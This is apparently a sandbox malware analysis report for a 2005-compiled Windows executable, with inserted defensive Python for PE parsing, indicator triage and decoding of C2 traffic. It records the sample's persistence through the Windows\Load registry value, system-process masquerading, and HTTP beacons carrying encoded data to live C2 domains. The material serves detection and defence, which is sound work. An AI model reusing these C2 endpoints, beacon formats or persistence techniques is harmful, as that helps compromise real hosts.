Analysis Date: 2014-06-20 14:29:57
MD5: 83a0483ee4b4bb502daa8df99cb45bb2
SHA1: 6b57fbc61d5ce270ecd13b8f15c51503170bcae6

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text  md5: 58b5c4ee9373586bc466c810cc90e32b  sha1: c1793f07490e2783d72e5d59ac12945508fe0615  size: 100864
Section .rdata  md5: 0c96a3b2073b7f516581d0ec78b97550  sha1: 10ffb165993d8a02ea44ffbd8e172627afbfce8b  size: 1024
Section .data  md5: 7a63e28c9a078e666d11bdf0b60be715  sha1: cc8e195de8e20d42cd692398884ae3ae0ffdfa2e  size: 61952
Section .imul  md5: f27d08286ca64a3de491734dd83ccde9  sha1: e01ba584c9be1ea3a84bcb046a03067238babd44  size: 1024
Timestamp: 2005-08-28 14:44:38
Version:
ProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1065
PEhash: 616a11e3029042b5508454755c14ffecfa2afe13
IMPhash: 389272e6c856baf046822db9ebfdde47
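The per-section md5/sha1 values and the compile timestamp above are read straight from the PE headers, and that is also where two static tells sit: `.imul` is not a section name any mainstream compiler or linker emits, and a 1 KB `.rdata` beside a 100 KB `.text` in a binary whose strings name only KERNEL32.dll and USER32.dll (no ws2_32 or wininet, although the runtime section shows DNS lookups and a WininetConnectionMutex) is consistent with a packed or crypted sample that resolves its real imports at run time. The Python below is an added example, not the sandbox's own code: it parses the COFF header and section table by hand, hashes each section's raw bytes as the table reports them, formats TimeDateStamp as UTC, and flags section names outside an illustrative `COMMON_SECTIONS` set. It builds a small PE in memory as constructed input (the section bodies are filler, the timestamp is the one shown above), so it runs offline.

```python
"""Parse a PE32 section table and hash each section the way the report does.

Added example, not the sandbox's own code. Standard library only; the input
is a small PE image constructed in memory so it runs offline.
"""
import calendar
import hashlib
import struct
from datetime import datetime, timezone

# Section names mainstream compilers and linkers emit. Anything else, such as
# the ".imul" section in the report, deserves a second look. Assumption: illustrative list.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                   ".reloc", ".bss", ".tls", ".pdata", ".CRT", "CODE", "DATA"}


def parse_pe(data):
    """Return (timestamp as 'YYYY-MM-DD HH:MM:SS' UTC, list of section dicts).

    Layout per the PE/COFF spec: e_lfanew at 0x3C, the "PE" signature, a 20-byte
    COFF header, SizeOfOptionalHeader bytes, then one 40-byte header per section.
    """
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, nsections, stamp, _symtab, _nsyms,
     opt_size, _chars) = struct.unpack_from("<HHIIIHH", data, coff)
    timestamp = datetime.fromtimestamp(stamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        body = data[raw_ptr:raw_ptr + raw_size]   # hash the on-disk bytes, not the mapped size
        sections.append({"name": name, "size": raw_size,
                         "md5": hashlib.md5(body).hexdigest(),
                         "sha1": hashlib.sha1(body).hexdigest(),
                         "unusual_name": name not in COMMON_SECTIONS})
    return timestamp, sections


def build_sample_pe(sections, stamp):
    """Construct a minimal PE: DOS header, signature, COFF header without an
    optional header, section table, then raw data aligned to 512 bytes.
    Constructed test input only; it is not a loadable executable."""
    e_lfanew = 0x40
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), stamp, 0, 0, 0, 0x102)
    table_end = e_lfanew + 4 + 20 + 40 * len(sections)
    first_raw = (table_end + 0x1FF) & ~0x1FF
    headers, bodies, raw_ptr = b"", b"", first_raw
    for name, body in sections:
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                               len(body), 0x1000, len(body), raw_ptr, 0, 0, 0, 0, 0x60000020)
        bodies += body
        raw_ptr += len(body)
    image = bytes(dos) + b"PE\0\0" + coff + headers
    return image + b"\0" * (first_raw - len(image)) + bodies


# Constructed sample: the report's timestamp, filler section bodies, and an
# ".imul" section named after the one in the report (0F AF is the IMUL opcode).
SAMPLE_STAMP = calendar.timegm((2005, 8, 28, 14, 44, 38, 0, 0, 0))
TEXT_BODY = bytes(range(256)) * 4
SAMPLE_PE = build_sample_pe([(".text", TEXT_BODY), (".rdata", b"abc"), (".imul", b"\x0f\xaf" * 8)],
                            SAMPLE_STAMP)

if __name__ == "__main__":
    ts, secs = parse_pe(SAMPLE_PE)
    print("Timestamp", ts)
    for s in secs:
        flag = "  <- unusual section name" if s["unusual_name"] else ""
        print(f'Section {s["name"]} md5: {s["md5"]} sha1: {s["sha1"]} size: {s["size"]}{flag}')
```

Point `parse_pe` at the bytes of a real sample and the md5/sha1/size columns it prints should match the ones a sandbox reports for the same file; a mismatch usually means the other tool hashed the mapped section (VirtualSize) rather than the raw one.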

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: doublemouseklick.com
Winsock DNS: greenherbalteaonline.com
Winsock DNS: 127.0.0.1
Winsock DNS: freecdvideo.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
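The runtime section above carries three host-side signals worth turning into checks: a copy of csrss.exe dropped in Temp and registered in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load (an auto-start value; whatever it names is launched at logon), dwm.exe and conhost.exe spawned from Application Data, and ProxyEnable switched on. None of those names legitimately run from a user profile directory, and dwm.exe (Vista) and conhost.exe (Windows 7) did not ship with Windows XP at all, which the "Documents and Settings" profile layout shows this host is. The sample also re-launches itself as `C:\malware.exe start<target>%<working directory>`. The Python below is an added example, not the sandbox's own code: it applies those checks to the paths, registry writes and command line transcribed from this report; `SYSTEM_BINARIES`, `ALLOWED_DIRS` and `ASEP_SUFFIXES` are illustrative assumptions for an XP-era host, not exhaustive lists.

```python
"""Triage checks over the runtime indicators recorded above.

Added example, not the sandbox's own code. SYSTEM_BINARIES, ALLOWED_DIRS and
ASEP_SUFFIXES are illustrative assumptions for a Windows XP-era host; the
sample data is transcribed from the report.
"""
import ntpath

# Process names that belong to Windows itself. On XP they live under
# %SystemRoot%\system32; a copy in Temp or Application Data is a masquerade.
SYSTEM_BINARIES = {"csrss.exe", "dwm.exe", "conhost.exe", "lsass.exe",
                   "svchost.exe", "winlogon.exe", "smss.exe", "services.exe"}
ALLOWED_DIRS = {r"c:\windows\system32", r"c:\windows"}

# Auto-start registry values (lower-case suffixes) worth flagging whenever written.
ASEP_SUFFIXES = (
    r"\windows nt\currentversion\windows\load",   # legacy win.ini 'load=', run at logon
    r"\windows nt\currentversion\windows\run",
    r"\windows\currentversion\run",
    r"\windows\currentversion\runonce",
)


def masquerading(paths):
    """Return (path, reason) for every system-binary name running outside ALLOWED_DIRS."""
    findings = []
    for p in paths:
        directory, name = ntpath.split(p)
        if name.lower() in SYSTEM_BINARIES and directory.lower() not in ALLOWED_DIRS:
            findings.append((p, "system process name outside %SystemRoot%"))
    return findings


def registry_findings(writes):
    """writes: iterable of (key_path, value). Flags auto-start writes and a proxy switched on."""
    findings = []
    for key, value in writes:
        k = key.lower()
        if k.endswith(ASEP_SUFFIXES) and value:
            findings.append((key, value, "persistence via auto-start registry value"))
        elif k.endswith(r"\internet settings\proxyenable") and value == "1":
            findings.append((key, value, "proxy enabled for the user session"))
    return findings


def parse_relaunch(cmdline):
    """The sample re-executes itself as '<exe> start<target>%<workdir>' (see the
    process tree above). Return (target, workdir), or None if the form does not match."""
    marker = " start"
    i = cmdline.find(marker)
    if i < 0:
        return None
    target, sep, workdir = cmdline[i + len(marker):].partition("%")
    if not sep or not target:
        return None
    return target, workdir


# Transcribed from the report's runtime section.
SAMPLE_PATHS = [
    r"C:\malware.exe",
    r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe",
    r"C:\Documents and Settings\Administrator\Application Data\dwm.exe",
    r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe",
]
SAMPLE_REGISTRY = [
    (r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable", "1"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load",
     r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe"),
]
SAMPLE_CMDLINE = (r"C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe"
                  r"%C:\Documents and Settings\Administrator\Application Data")

if __name__ == "__main__":
    for hit in masquerading(SAMPLE_PATHS) + registry_findings(SAMPLE_REGISTRY):
        print(hit)
    print(parse_relaunch(SAMPLE_CMDLINE))
```

The same three functions work over a process list and registry audit log from a live host; on Vista and later, add `c:\windows\syswow64` to `ALLOWED_DIRS` and expect dwm.exe and conhost.exe to be legitimate under system32.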

Network Details:

DNS: greenherbalteaonline.com  Type: A  208.73.211.237
DNS: greenherbalteaonline.com  Type: A  208.73.211.240
DNS: greenherbalteaonline.com  Type: A  208.73.211.250
DNS: greenherbalteaonline.com  Type: A  208.73.210.210
DNS: greenherbalteaonline.com  Type: A  208.73.211.179
DNS: zonetf.com  Type: A  208.73.210.205
DNS: zonetf.com  Type: A  208.73.210.203
DNS: zonetf.com  Type: A  208.73.211.249
DNS: zonetf.com  Type: A  208.73.211.246
DNS: zonetf.com  Type: A  208.73.211.173
DNS: zonetf.com  Type: A  208.73.211.173
DNS: zonetf.com  Type: A  208.73.210.205
DNS: zonetf.com  Type: A  208.73.210.203
DNS: zonetf.com  Type: A  208.73.211.249
DNS: zonetf.com  Type: A  208.73.211.246
DNS: freecdvideo.com  Type: A
DNS: doublemouseklick.com  Type: A
HTTP GET: http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup350.gif?v99=53&tq=gKZEtzyTX2FE1HRm9ihLIPyQSoG9QdZtE6XvOtMrFDcJGy0OMcAJBSftUXU%2FMn%2Bzc4KR3Anel365XeTD4AgCE4hIdzcPc3SollxV%2B7LzhcHcPUXLoXqB5JioVEI2nV%2FVGH2BKlixe6s5XbmvEnENHOJWjQ%2F8VHrCooAeEGThHXPZW7q326XtWO%2BavhppPXA2yP3zTmGLB9aF19KqjYMqPRp8i%2BuF9Nk7NFDKgOj330zDcotS2HJMafyEkw2XHvBXhRMpSFSsPCEbyE91UR4beBB5c9poTH%2BTV76ZSU7zxxzXgahco%2BAeE%2B%2BkzwvAMcD3SL1iICGUGJq%2BNwBPYUIfzfRNQOwnY34L%2FKmMbXbX2QQXiRFVMd6kUri8chVlffFXF%2Fzf0biEoQMrGCV4tg92PqZ5%2FwEBKcSiLyFi6XEjFQICiNZ%2Bjm5dLkfLgDmFB2H16sFeWSn70Zrjd55wV2Wgwia8njk3r2MY60ZcvU1VeydYgOdWsY8
User-Agent: mozilla/2.0
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNzVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 208.73.211.237:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.210.205:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.211.173:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.211.173:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.211.173:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.211.173:80
Flows TCP: 192.168.1.1:1038 ➝ 208.73.211.173:80
Flows TCP: 192.168.1.1:1039 ➝ 208.73.211.173:80
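Three things in the network section above are worth extracting rather than reading off by eye. Every address returned for greenherbalteaonline.com and zonetf.com lies in 208.73.210.0/23, so one block covers both C2 names. The seven POSTs to zonetf.com line up with the seven TCP flows to its addresses (one to 208.73.210.205, six to 208.73.211.173), and each carries a URL-encoded base64 blob in the `tq` parameter whose first 150 characters are identical across beacons, which means identical leading bytes in every message: whatever encoding sits underneath is not randomised per request. The same process also sends two different User-Agent strings, `mozilla/2.0` on the GET and an MSIE 6.0 string on the POSTs. The Python below is an added example, not the sandbox's own code: the DNS answers and the GET plus the first two POSTs are transcribed from the report, the grouping and decoding logic is mine. `unquote` is used deliberately instead of `unquote_plus`, since a `+` in these values is a base64 digit, not a space.

```python
"""IOC extraction and C2 query-string inspection for the network section above.

Added example, not the sandbox's own code. The DNS answers and HTTP requests
are transcribed from the report; the grouping and decoding logic is mine.
"""
import base64
import binascii
import ipaddress
import math
from collections import defaultdict
from urllib.parse import unquote, urlsplit

DNS_ANSWERS = [  # (name, A record) transcribed from the report, repeats kept
    ("greenherbalteaonline.com", ip) for ip in
    "208.73.211.237 208.73.211.240 208.73.211.250 208.73.210.210 208.73.211.179".split()
] + [
    ("zonetf.com", ip) for ip in
    ("208.73.210.205 208.73.210.203 208.73.211.249 208.73.211.246 208.73.211.173 "
     "208.73.211.173 208.73.210.205 208.73.210.203 208.73.211.249 208.73.211.246").split()
]

HTTP_REQUESTS = [  # (method, url, user_agent): the GET and the first two POSTs above
    ("GET", "http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup350.gif?v99=53&tq=gKZEtzyTX2FE1HRm9ihLIPyQSoG9QdZtE6XvOtMrFDcJGy0OMcAJBSftUXU%2FMn%2Bzc4KR3Anel365XeTD4AgCE4hIdzcPc3SollxV%2B7LzhcHcPUXLoXqB5JioVEI2nV%2FVGH2BKlixe6s5XbmvEnENHOJWjQ%2F8VHrCooAeEGThHXPZW7q326XtWO%2BavhppPXA2yP3zTmGLB9aF19KqjYMqPRp8i%2BuF9Nk7NFDKgOj330zDcotS2HJMafyEkw2XHvBXhRMpSFSsPCEbyE91UR4beBB5c9poTH%2BTV76ZSU7zxxzXgahco%2BAeE%2B%2BkzwvAMcD3SL1iICGUGJq%2BNwBPYUIfzfRNQOwnY34L%2FKmMbXbX2QQXiRFVMd6kUri8chVlffFXF%2Fzf0biEoQMrGCV4tg92PqZ5%2FwEBKcSiLyFi6XEjFQICiNZ%2Bjm5dLkfLgDmFB2H16sFeWSn70Zrjd55wV2Wgwia8njk3r2MY60ZcvU1VeydYgOdWsY8", "mozilla/2.0"),
    ("POST", "http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
    ("POST", "http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"),
]

def resolved_ips(answers):
    """Map each queried name to the distinct addresses it resolved to."""
    seen = defaultdict(set)
    for name, ip in answers:
        seen[name].add(ip)
    return {name: sorted(ips, key=ipaddress.ip_address) for name, ips in seen.items()}

def hosting_block(ips):
    """Smallest CIDR block containing every address. Several C2 names landing in
    one tight block is the case for blocking the range rather than single hosts."""
    addrs = [ipaddress.ip_address(ip) for ip in ips]
    net = ipaddress.ip_network(ips[0])
    while not all(a in net for a in addrs):
        net = net.supernet()
    return net

def query_param(url, name):
    """Percent-decode one query parameter with unquote, not unquote_plus:
    a '+' in these values is a base64 digit, not a space."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return None

def decode_b64(text):
    """Strict base64 decode with missing padding restored; None if not base64."""
    padded = text + "=" * (-len(text) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None

def entropy(blob):
    """Shannon entropy in bits per byte; values near 8 mean encrypted or compressed."""
    if not blob:
        return 0.0
    probs = [blob.count(b) / len(blob) for b in set(blob)]
    return -sum(p * math.log2(p) for p in probs)

def common_prefix_len(strings):
    """Characters shared at the start of every string. Base64 is deterministic,
    so a shared prefix means identical leading bytes in every beacon."""
    n = 0
    for chars in zip(*strings):
        if len(set(chars)) != 1:
            break
        n += 1
    return n

def triage(answers, requests):
    """What a blocklist and a detection rule need from this traffic."""
    names = resolved_ips(answers)
    every_ip = sorted({ip for ips in names.values() for ip in ips})
    blobs = [decode_b64(query_param(url, "tq") or "") for _, url, _ in requests]
    posts = [query_param(url, "tq") for method, url, _ in requests if method == "POST"]
    return {
        "domains": sorted(names),
        "hosting_block": str(hosting_block(every_ip)),
        "user_agents": sorted({ua for _, _, ua in requests}),
        "post_shared_prefix": common_prefix_len(posts),
        "payload_bytes": [None if b is None else len(b) for b in blobs],
        "payload_entropy": [None if b is None else round(entropy(b), 2) for b in blobs],
    }

if __name__ == "__main__":
    for key, value in triage(DNS_ANSWERS, HTTP_REQUESTS).items():
        print(f"{key}: {value}")
```

The two POST blobs decode to 129 and 121 bytes and both start with the bytes 80 A6 (so does the GET blob, since `gKZ` and `gKY` share those leading bits); a network signature should key on the fixed URI path and the `tq=gK` prefix rather than on any single domain or address, since the answers rotate across the /23.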

Strings
040904b0
1.0.0.3
1065
210R
&"A%
%BQ&F
Br'&
B&S&
`!D@
E1cG
E2S`
FileVersion
%f' P
Gp1 
PCGCQ
p#'F
PrivateBuild
ProductVersion
q&CP
S3s"2
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
0;A`!C
0`p*(B
`0W=|]
1Vs?D&D
2NQ<3g
,4Ub,X
_6Kua+
6o0=vZ
"6[!$S@
6]s77+
7%2TSZa
7<dC|6
 !)8)4G
8eqgPX!	r
.8h#TK
 8)=ZI
9w1h7)
`A/!1T
aIN+/'
`Aq`$,d3
B:1D6j
bmi$=#N^
BU(fof
bZl1t" 
\c#EV?
ckuQ@l
CompareStringA
@.data
d@}kyC.
e1tn-D
E"!Bj	
e-&Jsto
eNJyWM
EnumResourceNamesW
ERfGv#:
.\E%w0kU;
ExcludeUpdateRgn
FBt^h\3
fEey(J
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileW
FindNextFileW
FindResourceW
fm3v=PU
FreeLibrary
f^sRJ1
~FvvF	
]fYl'E%*
;_}#GD
GetCapture
GetLocalTime
GetShortPathNameW
GetStringTypeW
GetUpdateRgn
GetVDMCurrentDirectories
GetWindowInfo
GoPn@/]
/gSG>Nn
h(4Yr\
H(a]#:1F
HeapCreate
,h':eB
)H/HOH
I6o9]h
I}$*;Gt
ikOht 
\i;l> 
InvalidateRgn
IWnHqI
i)Y_SXa
iytFCC
J:aVgz
_jc77'
jMzrb-?
Jn(l<z
KERNEL32.dll
Kj/f<s7 3
k<-N_c
K|=ngJ
`kW9g%
l.jX{v
LoadResource
LocalFileTimeToFileTime
)LuT;P
LXSWHg
LzA<Bv
m=68UE
-m>kiy
`MqPu V
m;T%YJ
n0Y)OI
NbKl?v
NzOxZ;D
oEk)@^
oRU8#	
OWs!Z 
.oXG=|lh
P9-]qh
pAGcvS
+PdqF x
 ./pga
-PI%3[=
PI`lGV
P;%nUiO
p)#VOB
QE}&F;
(qnEUE
,/qO`E
.RA@M\
`.rdata
$RD)Ua
RegisterWaitForSingleObject
ReleaseCapture
@r%gw?
Rich`x
'r)=vqn
^S'aP^
SearchPathW
SetCapture
SetCurrentDirectoryW
SetEnvironmentVariableW
SetErrorMode
SetThreadPriorityBoost
sm}YvO
sNam&{*
sS	zbe
}sX5Q/{"Z
>s	y5M
SystemTimeToFileTime
t5l@	vRqN
tcy+!<
!This program cannot be run in DOS mode.
<tiI;6
.)?Tj*
T*s*mf
}TSn*[,e
"TTc'v
tY*VM'3g
$TZz|J
U_~8vX
UfGY[V
.uG`l!
uiuOMt.JX
u_<,-OQ
uP^<(Z
uRybUlt
USER32.dll
V0XfjU
ValidateRect
ValidateRgn
vAn|21
{VCMXVg
/v,/*P
+ |,@W9\
WfCHCw
XB@-Le
x^mfe,G
/,xryF
XsHyx!
Y5mm2k
Yh		<B
Y:Qo@@f
YsOyHb
,}:zbc
ZIJYgv
ZiUh!k
-Z#;&J
zl9\mR;i